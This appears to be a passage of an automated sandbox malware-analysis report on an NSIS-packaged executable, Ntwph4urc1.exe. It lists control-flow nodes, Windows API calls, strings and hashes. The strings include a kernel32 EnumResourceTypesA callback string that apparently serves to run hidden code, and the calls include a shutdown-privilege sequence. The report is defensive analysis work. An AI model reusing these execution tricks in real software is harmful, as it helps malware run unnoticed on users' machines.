403d93 18 API calls 4418->4423 4419->4414 4422 403be7 4420->4422 4424 403bf7 4421->4424 4422->4416 4425 405d0f 2 API calls 4422->4425 4426 403cd1 4423->4426 4529 4063ee lstrcpynW 4424->4529 4425->4416 4428 403d60 4426->4428 4429 403cdd ShowWindow 4426->4429 4522 405529 OleInitialize 4428->4522 4431 406773 3 API calls 4429->4431 4433 403cf5 4431->4433 4432 403d66 4434 403d82 4432->4434 4435 403d6a 4432->4435 4436 403d03 GetClassInfoW 4433->4436 4440 406773 3 API calls 4433->4440 4439 40140b 2 API calls 4434->4439 4435->4412 4442 40140b 2 API calls 4435->4442 4437 403d17 GetClassInfoW RegisterClassW 4436->4437 4438 403d2d DialogBoxParamW 4436->4438 4437->4438 4441 40140b 2 API calls 4438->4441 4439->4412 4440->4436 4441->4412 4442->4412 4443->4291 4444->4323 4445->4292 4447 4039fb 4446->4447 4448 4039ed CloseHandle 4446->4448 4541 403a28 4447->4541 4448->4447 4451 405b00 67 API calls 4452 403816 OleUninitialize 4451->4452 4452->4299 
4452->4300 4454 405a69 4453->4454 4455 403835 ExitProcess 4454->4455 4456 405a7d MessageBoxIndirectW 4454->4456 4456->4455 4457->4332 4458->4336 4460 405a16 4459->4460 4461 405a0a CloseHandle 4459->4461 4460->4336 4461->4460 4463 401389 2 API calls 4462->4463 4464 401420 4463->4464 4464->4301 4466 405f20 GetTickCount GetTempFileNameW 4465->4466 4467 4034a0 4466->4467 4468 405f56 4466->4468 4467->4279 4468->4466 4468->4467 4469->4361 4470->4363 4471->4367 4473 402fd2 4472->4473 4474 402fba 4472->4474 4477 402fe2 GetTickCount 4473->4477 4478 402fda 4473->4478 4475 402fc3 DestroyWindow 4474->4475 4476 402fca 4474->4476 4475->4476 4476->4370 4479 402ff0 CreateDialogParamW ShowWindow 4477->4479 4480 403013 4477->4480 4508 40681f 4478->4508 4479->4480 4480->4370 4483->4376 4486 403265 4484->4486 4485 403293 4487 403444 ReadFile 4485->4487 4486->4485 4512 40345a SetFilePointer 4486->4512 4489 40329e 4487->4489 4490 4032b0 GetTickCount 4489->4490 4491 4033dd 4489->4491 4496 4033c7 4489->4496 4493 4032dc 4490->4493 4490->4496 4492 40341f 4491->4492 4497 4033e1 4491->4497 4494 403444 ReadFile 4492->4494 4495 403444 ReadFile 4493->4495 4493->4496 4500 403332 GetTickCount 4493->4500 4501 403357 MulDiv wsprintfW 4493->4501 4503 405f96 WriteFile 4493->4503 4494->4496 4495->4493 4496->4384 4497->4496 4498 403444 ReadFile 4497->4498 4499 405f96 WriteFile 4497->4499 4498->4497 4499->4497 4500->4493 4502 405456 24 API calls 4501->4502 4502->4493 4503->4493 4505 405f67 ReadFile 4504->4505 4506 403457 4505->4506 4506->4386 4507->4378 4509 40683c PeekMessageW 4508->4509 4510 406832 DispatchMessageW 4509->4510 4511 402fe0 4509->4511 4510->4509 4511->4370 4512->4485 4513->4395 4515 403da7 4514->4515 4530 406335 wsprintfW 4515->4530 4517 403e18 4531 403e4c 4517->4531 4519 403b48 4519->4400 4520 403e1d 4520->4519 4521 40642b 17 API calls 4520->4521 4521->4520 4534 404390 4522->4534 4524 405573 4525 404390 SendMessageW 4524->4525 4527 405585 OleUninitialize 4525->4527 4526 40554c 4526->4524 
4537 401389 4526->4537 4527->4432 4529->4402 4530->4517 4532 40642b 17 API calls 4531->4532 4533 403e5a SetWindowTextW 4532->4533 4533->4520 4535 4043a8 4534->4535 4536 404399 SendMessageW 4534->4536 4535->4526 4536->4535 4539 401390 4537->4539 4538 4013fe 4538->4526 4539->4538 4540 4013cb MulDiv SendMessageW 4539->4540 4540->4539 4542 403a36 4541->4542 4543 403a3b FreeLibrary GlobalFree 4542->4543 4544 403a00 4542->4544 4543->4543 4543->4544 4544->4451 4545 402522 4556 402d7e 4545->4556 4548 402d3e 17 API calls 4549 402535 4548->4549 4550 402540 RegQueryValueExW 4549->4550 4555 402925 4549->4555 4551 402560 4550->4551 4552 402566 RegCloseKey 4550->4552 4551->4552 4561 406335 wsprintfW 4551->4561 4552->4555 4557 402d3e 17 API calls 4556->4557 4558 402d95 4557->4558 4559 40625b RegOpenKeyExW 4558->4559 4560 40252c 4559->4560 4560->4548 4561->4552 5576 4021a2 5577 402d3e 17 API calls 5576->5577 5578 4021a9 5577->5578 5579 402d3e 17 API calls 5578->5579 5580 4021b3 5579->5580 5581 402d3e 17 API calls 5580->5581 5582 4021bd 5581->5582 5583 402d3e 17 API calls 5582->5583 5584 4021c7 5583->5584 5585 402d3e 17 API calls 5584->5585 5587 4021d1 5585->5587 5586 402210 CoCreateInstance 5589 40222f 5586->5589 5587->5586 5588 402d3e 17 API calls 5587->5588 5588->5586 5590 401423 24 API calls 5589->5590 5591 4022ee 5589->5591 5590->5591 5592 4015a3 5593 402d3e 17 API calls 5592->5593 5594 4015aa SetFileAttributesW 5593->5594 5595 4015bc 5594->5595 5596 401fa4 5597 402d3e 17 API calls 5596->5597 5598 401faa 5597->5598 5599 405456 24 API calls 5598->5599 5600 401fb4 5599->5600 5601 4059d7 2 API calls 5600->5601 5602 401fba 5601->5602 5603 402925 5602->5603 5605 40688e 5 API calls 5602->5605 5607 401fdd CloseHandle 5602->5607 5606 401fcf 5605->5606 5606->5607 5609 406335 wsprintfW 5606->5609 5607->5603 5609->5607 5610 40202a 5611 402d3e 17 API calls 5610->5611 5612 402031 5611->5612 5613 4067e3 5 API calls 5612->5613 5614 402040 5613->5614 5615 40205c GlobalAlloc 5614->5615 5618 
4020c4 5614->5618 5616 402070 5615->5616 5615->5618 5617 4067e3 5 API calls 5616->5617 5619 402077 5617->5619 5620 4067e3 5 API calls 5619->5620 5621 402081 5620->5621 5621->5618 5625 406335 wsprintfW 5621->5625 5623 4020b6 5626 406335 wsprintfW 5623->5626 5625->5623 5626->5618 5627 4023aa 5628 4023b2 5627->5628 5629 4023b8 5627->5629 5630 402d3e 17 API calls 5628->5630 5631 402d3e 17 API calls 5629->5631 5632 4023c6 5629->5632 5630->5629 5631->5632 5634 402d3e 17 API calls 5632->5634 5635 4023d4 5632->5635 5633 402d3e 17 API calls 5636 4023dd WritePrivateProfileStringW 5633->5636 5634->5635 5635->5633 5637 402f2b 5638 402f3d SetTimer 5637->5638 5640 402f56 5637->5640 5638->5640 5639 402fab 5640->5639 5641 402f70 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5640->5641 5641->5639 4659 40242c 4660 402434 4659->4660 4661 40245f 4659->4661 4662 402d7e 17 API calls 4660->4662 4663 402d3e 17 API calls 4661->4663 4664 40243b 4662->4664 4665 402466 4663->4665 4666 402445 4664->4666 4669 402473 4664->4669 4671 402dfc 4665->4671 4668 402d3e 17 API calls 4666->4668 4670 40244c RegDeleteValueW RegCloseKey 4668->4670 4670->4669 4672 402e09 4671->4672 4673 402e10 4671->4673 4672->4669 4673->4672 4675 402e41 4673->4675 4676 40625b RegOpenKeyExW 4675->4676 4677 402e6f 4676->4677 4678 402f24 4677->4678 4679 402e79 4677->4679 4678->4672 4680 402e7f RegEnumValueW 4679->4680 4684 402ea2 4679->4684 4681 402f09 RegCloseKey 4680->4681 4680->4684 4681->4678 4682 402ede RegEnumKeyW 4683 402ee7 RegCloseKey 4682->4683 4682->4684 4685 4067e3 5 API calls 4683->4685 4684->4681 4684->4682 4684->4683 4686 402e41 6 API calls 4684->4686 4687 402ef7 4685->4687 4686->4684 4688 402f19 4687->4688 4689 402efb RegDeleteKeyW 4687->4689 4688->4678 4689->4678 5642 401a30 5643 402d3e 17 API calls 5642->5643 5644 401a39 ExpandEnvironmentStringsW 5643->5644 5645 401a4d 5644->5645 5647 401a60 5644->5647 5646 401a52 lstrcmpW 5645->5646 5645->5647 5646->5647 5648 404db1 GetDlgItem GetDlgItem 5649 404e05 7 API 
calls 5648->5649 5657 40502f 5648->5657 5650 404ea2 SendMessageW 5649->5650 5651 404eaf DeleteObject 5649->5651 5650->5651 5652 404eba 5651->5652 5654 404ef1 5652->5654 5656 40642b 17 API calls 5652->5656 5653 405117 5655 4051c0 5653->5655 5665 40516d SendMessageW 5653->5665 5691 405022 5653->5691 5658 404344 18 API calls 5654->5658 5661 4051d5 5655->5661 5662 4051c9 SendMessageW 5655->5662 5663 404ed3 SendMessageW SendMessageW 5656->5663 5657->5653 5660 4050a1 5657->5660 5668 404cff 5 API calls 5657->5668 5659 404f05 5658->5659 5664 404344 18 API calls 5659->5664 5660->5653 5666 405109 SendMessageW 5660->5666 5672 4051e7 ImageList_Destroy 5661->5672 5673 4051ee 5661->5673 5677 4051fe 5661->5677 5662->5661 5663->5652 5680 404f16 5664->5680 5670 405182 SendMessageW 5665->5670 5665->5691 5666->5653 5667 4043ab 8 API calls 5671 4053c3 5667->5671 5668->5660 5669 405377 5678 405389 ShowWindow GetDlgItem ShowWindow 5669->5678 5669->5691 5676 405195 5670->5676 5672->5673 5674 4051f7 GlobalFree 5673->5674 5673->5677 5674->5677 5675 404ff1 GetWindowLongW SetWindowLongW 5679 40500a 5675->5679 5685 4051a6 SendMessageW 5676->5685 5677->5669 5690 404d7f 4 API calls 5677->5690 5693 405239 5677->5693 5678->5691 5681 405027 5679->5681 5682 40500f ShowWindow 5679->5682 5680->5675 5684 404f69 SendMessageW 5680->5684 5686 404fec 5680->5686 5688 404fa7 SendMessageW 5680->5688 5689 404fbb SendMessageW 5680->5689 5701 404379 SendMessageW 5681->5701 5700 404379 SendMessageW 5682->5700 5684->5680 5685->5655 5686->5675 5686->5679 5688->5680 5689->5680 5690->5693 5691->5667 5692 405343 5694 40534d InvalidateRect 5692->5694 5696 405359 5692->5696 5695 405267 SendMessageW 5693->5695 5697 40527d 5693->5697 5694->5696 5695->5697 5696->5669 5702 404cba 5696->5702 5697->5692 5699 4052f1 SendMessageW SendMessageW 5697->5699 5699->5697 5700->5691 5701->5657 5705 404bf1 5702->5705 5704 404ccf 5704->5669 5706 404c0a 5705->5706 5707 40642b 17 API calls 5706->5707 5708 404c6e 5707->5708 5709 40642b 17 
API calls 5708->5709 5710 404c79 5709->5710 5711 40642b 17 API calls 5710->5711 5712 404c8f lstrlenW wsprintfW SetDlgItemTextW 5711->5712 5712->5704 5718 4044b4 lstrlenW 5719 4044d3 5718->5719 5720 4044d5 WideCharToMultiByte 5718->5720 5719->5720 5721 404835 5722 404861 5721->5722 5723 404872 5721->5723 5782 405a38 GetDlgItemTextW 5722->5782 5725 40487e GetDlgItem 5723->5725 5730 4048dd 5723->5730 5727 404892 5725->5727 5726 40486c 5729 40669d 5 API calls 5726->5729 5732 4048a6 SetWindowTextW 5727->5732 5737 405d6e 4 API calls 5727->5737 5728 4049c1 5780 404b70 5728->5780 5784 405a38 GetDlgItemTextW 5728->5784 5729->5723 5730->5728 5733 40642b 17 API calls 5730->5733 5730->5780 5735 404344 18 API calls 5732->5735 5738 404951 SHBrowseForFolderW 5733->5738 5734 4049f1 5739 405dcb 18 API calls 5734->5739 5740 4048c2 5735->5740 5736 4043ab 8 API calls 5741 404b84 5736->5741 5742 40489c 5737->5742 5738->5728 5743 404969 CoTaskMemFree 5738->5743 5744 4049f7 5739->5744 5745 404344 18 API calls 5740->5745 5742->5732 5746 405cc3 3 API calls 5742->5746 5747 405cc3 3 API calls 5743->5747 5785 4063ee lstrcpynW 5744->5785 5748 4048d0 5745->5748 5746->5732 5749 404976 5747->5749 5783 404379 SendMessageW 5748->5783 5752 4049ad SetDlgItemTextW 5749->5752 5757 40642b 17 API calls 5749->5757 5752->5728 5753 4048d6 5755 4067e3 5 API calls 5753->5755 5754 404a0e 5756 4067e3 5 API calls 5754->5756 5755->5730 5764 404a15 5756->5764 5758 404995 lstrcmpiW 5757->5758 5758->5752 5761 4049a6 lstrcatW 5758->5761 5759 404a56 5786 4063ee lstrcpynW 5759->5786 5761->5752 5762 404a5d 5763 405d6e 4 API calls 5762->5763 5765 404a63 GetDiskFreeSpaceW 5763->5765 5764->5759 5767 405d0f 2 API calls 5764->5767 5769 404aae 5764->5769 5768 404a87 MulDiv 5765->5768 5765->5769 5767->5764 5768->5769 5770 404b1f 5769->5770 5771 404cba 20 API calls 5769->5771 5772 404b42 5770->5772 5774 40140b 2 API calls 5770->5774 5773 404b0c 5771->5773 5787 404366 KiUserCallbackDispatcher 5772->5787 5776 404b21 
SetDlgItemTextW 5773->5776 5777 404b11 5773->5777 5774->5772 5776->5770 5779 404bf1 20 API calls 5777->5779 5778 404b5e 5778->5780 5781 40478e SendMessageW 5778->5781 5779->5770 5780->5736 5781->5780 5782->5726 5783->5753 5784->5734 5785->5754 5786->5762 5787->5778 5788 401735 5789 402d3e 17 API calls 5788->5789 5790 40173c SearchPathW 5789->5790 5791 401757 5790->5791 5792 73f51000 5793 73f5101b 5 API calls 5792->5793 5794 73f51019 5793->5794 5795 402636 5796 402665 5795->5796 5797 40264a 5795->5797 5798 402695 5796->5798 5799 40266a 5796->5799 5800 402d1c 17 API calls 5797->5800 5802 402d3e 17 API calls 5798->5802 5801 402d3e 17 API calls 5799->5801 5807 402651 5800->5807 5803 402671 5801->5803 5804 40269c lstrlenW 5802->5804 5812 406410 WideCharToMultiByte 5803->5812 5804->5807 5806 402685 lstrlenA 5806->5807 5808 4026c9 5807->5808 5809 4026df 5807->5809 5811 405fc5 5 API calls 5807->5811 5808->5809 5810 405f96 WriteFile 5808->5810 5810->5809 5811->5808 5812->5806 5813 4014b8 5814 4014be 5813->5814 5815 401389 2 API calls 5814->5815 5816 4014c6 5815->5816 5817 401d38 5818 402d1c 17 API calls 5817->5818 5819 401d3f 5818->5819 5820 402d1c 17 API calls 5819->5820 5821 401d4b GetDlgItem 5820->5821 5822 402630 5821->5822 5823 4028bb 5824 4028c1 5823->5824 5825 4028c9 FindClose 5824->5825 5826 402bc2 5824->5826 5825->5826

                                              Control-flow Graph
                                              APIs
                                              • SetErrorMode.KERNELBASE ref: 004034C5
                                              • GetVersion.KERNEL32 ref: 004034CB
                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034FE
                                              • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040353B
                                              • OleInitialize.OLE32(00000000), ref: 00403542
                                              • SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 0040355E
                                              • GetCommandLineW.KERNEL32(007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 00403573
                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000020,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000,?,00000007,00000009,0000000B), ref: 004035AB
                                                • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                                • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E5
                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036F6
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403702
                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403716
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040371E
                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040372F
                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403737
                                              • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 0040374B
                                                • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                              • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403816
                                              • ExitProcess.KERNEL32 ref: 00403837
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040384A
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403859
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403864
                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403870
                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040388C
                                              • DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,00000009,?,00000007,00000009,0000000B), ref: 004038E6
                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\Ntwph4urc1.exe,0079F708,00000001,?,00000007,00000009,0000000B), ref: 004038FA
                                              • CloseHandle.KERNEL32(00000000,0079F708,0079F708,?,0079F708,00000000,?,00000007,00000009,0000000B), ref: 00403927
                                              • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403956
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0040395D
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403972
                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403995
                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BA
                                              • ExitProcess.KERNEL32 ref: 004039DD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                              • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$C:\Users\user\Desktop$C:\Users\user\Desktop\Ntwph4urc1.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$kernel32::EnumResourceTypesA(i 0,i r8,i 0)$~nsu
                                              • API String ID: 3441113951-563296119
                                              • Opcode ID: ef7bc40cfc21a65b5c7abadd4c778368bce5dd0c15bdea56e8fa6b9d03db3f5a
                                              • Instruction ID: d7b9bf8e5ec5db16f392776339999e6c5d6af7d7718e861a4dfbc7241a8cc938
                                              • Opcode Fuzzy Hash: ef7bc40cfc21a65b5c7abadd4c778368bce5dd0c15bdea56e8fa6b9d03db3f5a
                                              • Instruction Fuzzy Hash: 65D1F6B1200310AAD7207F659D49B2B3AACEB81749F10843FF581B62D1DB7D8A55C76E

                                               Control-flow Graph

                                              APIs
                                              • GetDlgItem.USER32(?,00000403), ref: 004055F3
                                              • GetDlgItem.USER32(?,000003EE), ref: 00405602
                                              • GetClientRect.USER32(?,?), ref: 0040563F
                                              • GetSystemMetrics.USER32(00000002), ref: 00405646
                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405667
                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405678
                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040568B
                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405699
                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056AC
                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056CE
                                              • ShowWindow.USER32(?,00000008), ref: 004056E2
                                              • GetDlgItem.USER32(?,000003EC), ref: 00405703
                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405713
                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040572C
                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405738
                                              • GetDlgItem.USER32(?,000003F8), ref: 00405611
                                                • Part of subcall function 00404379: SendMessageW.USER32(00000028,?,00000001,004041A4), ref: 00404387
                                              • GetDlgItem.USER32(?,000003EC), ref: 00405755
                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005529,00000000), ref: 00405763
                                              • CloseHandle.KERNELBASE(00000000), ref: 0040576A
                                              • ShowWindow.USER32(00000000), ref: 0040578E
                                              • ShowWindow.USER32(?,00000008), ref: 00405793
                                              • ShowWindow.USER32(00000008), ref: 004057DD
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405811
                                              • CreatePopupMenu.USER32 ref: 00405822
                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405836
                                              • GetWindowRect.USER32(?,?), ref: 00405856
                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040586F
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A7
                                              • OpenClipboard.USER32(00000000), ref: 004058B7
                                              • EmptyClipboard.USER32 ref: 004058BD
                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C9
                                              • GlobalLock.KERNEL32(00000000), ref: 004058D3
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E7
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405907
                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405912
                                              • CloseClipboard.USER32 ref: 00405918
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                              • String ID: {
                                              • API String ID: 590372296-366298937
                                              • Opcode ID: 76257269951a7008dfdc90867c28ba5585546a04cccc1881335d18026b5b47bc
                                              • Instruction ID: ce320b3aa05de7a86cd71a66421b7d26801e1fa413e38a053d13c4a4e4f3a794
                                              • Opcode Fuzzy Hash: 76257269951a7008dfdc90867c28ba5585546a04cccc1881335d18026b5b47bc
                                              • Instruction Fuzzy Hash: 43B15BB1900608FFDB119F64DD89EAE7B79FB44354F00802AFA45B61A0CB794E51DFA8
                                              APIs
                                                • Part of subcall function 73F5121B: GlobalAlloc.KERNEL32(00000040,?,73F5123B,?,73F512DF,00000019,73F511BE,-000000A0), ref: 73F51225
                                              • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 73F51C8D
                                              • lstrcpyW.KERNEL32(00000008,?), ref: 73F51CD5
                                              • lstrcpyW.KERNEL32(00000808,?), ref: 73F51CDF
                                              • GlobalFree.KERNEL32(00000000), ref: 73F51CF2
                                              • GlobalFree.KERNEL32(?), ref: 73F51DD4
                                              • GlobalFree.KERNEL32(?), ref: 73F51DD9
                                              • GlobalFree.KERNEL32(?), ref: 73F51DDE
                                              • GlobalFree.KERNEL32(00000000), ref: 73F51FC8
                                              • lstrcpyW.KERNEL32(?,?), ref: 73F52182
                                              • GetModuleHandleW.KERNEL32(00000008), ref: 73F52201
                                              • LoadLibraryW.KERNEL32(00000008), ref: 73F52212
                                              • GetProcAddress.KERNEL32(?,?), ref: 73F5226C
                                              • lstrlenW.KERNEL32(00000808), ref: 73F52286
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2728459124.0000000073F51000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F50000, based on PE: true
                                               • Associated: 00000000.00000002.2726489053.0000000073F50000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000000.00000002.2729055985.0000000073F54000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000000.00000002.2732986252.0000000073F56000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73f50000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                              • String ID:
                                              • API String ID: 245916457-0
                                              • Opcode ID: 30d8e6e7d9ccce055acd7e39682cc9e998c16f4471546fa32e25b39f27f97fe4
                                              • Instruction ID: fb91855c2f5d0efd1cde8e7c47737a0f3719c06dffc6e6d0f38138359feae2d9
                                              • Opcode Fuzzy Hash: 30d8e6e7d9ccce055acd7e39682cc9e998c16f4471546fa32e25b39f27f97fe4
                                              • Instruction Fuzzy Hash: 4B22AA72D10A0AEBDF11DFA4C9807EEB7F5FB04385F24462EE166E2290D774A681CB50

                                               Control-flow Graph

                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B29
                                              • lstrcatW.KERNEL32(007A3F50,\*.*,007A3F50,?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B71
                                              • lstrcatW.KERNEL32(?,0040A014,?,007A3F50,?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B94
                                              • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B9A
                                              • FindFirstFileW.KERNEL32(007A3F50,?,?,?,0040A014,?,007A3F50,?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BAA
                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C4A
                                              • FindClose.KERNEL32(00000000), ref: 00405C59
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                              • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$C:\Users\user\AppData\Local\Temp\$P?z$\*.*
                                              • API String ID: 2035342205-2179773686
                                              • Opcode ID: 9bcf84aa20197a85572e9300232fccf325a3569ae83ff5500f6c5511c7c60933
                                              • Instruction ID: d176cfcb2707c6ba555092c79fa60715814496245c058da0d6595325efdb1864
                                              • Opcode Fuzzy Hash: 9bcf84aa20197a85572e9300232fccf325a3569ae83ff5500f6c5511c7c60933
                                              • Instruction Fuzzy Hash: BE41D530804A15AAEB216B658D89EBF7678EF42715F14813FF801711D2DB7C5E82CE6E
                                              APIs
                                              • FindFirstFileW.KERNELBASE(?,007A4F98,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,00405E14,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 00406757
